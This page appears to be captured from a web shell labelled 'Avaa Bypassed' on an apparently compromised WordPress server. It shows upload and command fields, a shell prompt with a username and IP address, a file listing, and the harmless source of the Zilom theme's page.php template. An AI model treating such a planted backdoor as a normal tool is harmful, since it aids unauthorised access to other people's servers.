[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.191.218.101: ~ $
<?php 
$disable_page_title = false;
if ( metadata_exists( 'post', get_the_ID(), 'zilom_disable_page_title' ) ) {
  $disable_page_title = get_post_meta(get_the_ID(), 'zilom_disable_page_title', true);
}
if ( have_posts() ) : the_post(); ?>
    <div <?php post_class( 'clearfix' ); ?> id="<?php echo esc_attr(get_the_ID()); ?>">

        <?php do_action( 'zilom_page_content_before' ); ?>
 
        <?php if(!$disable_page_title){ ?>
          <h1 class="title"><?php the_title(); ?></h1>
        <?php } ?>

        <?php the_content(); ?>

        <div class="link-pages"><?php wp_link_pages(); ?></div>
        <div class="comment-page-wrapper clearfix">
           <?php
               // If comments are open or we have at least one comment, load up the comment template.
              if ( comments_open() || get_comments_number() ) {
                  comments_template();
              }          
            ?>
         </div>
        <?php do_action( 'zilom_page_content_after' ); ?>

    </div>

<?php endif; ?>

Filemanager

Name Type Size Permission Actions
archive.php File 2.02 KB 0644
page.php File 1.03 KB 0644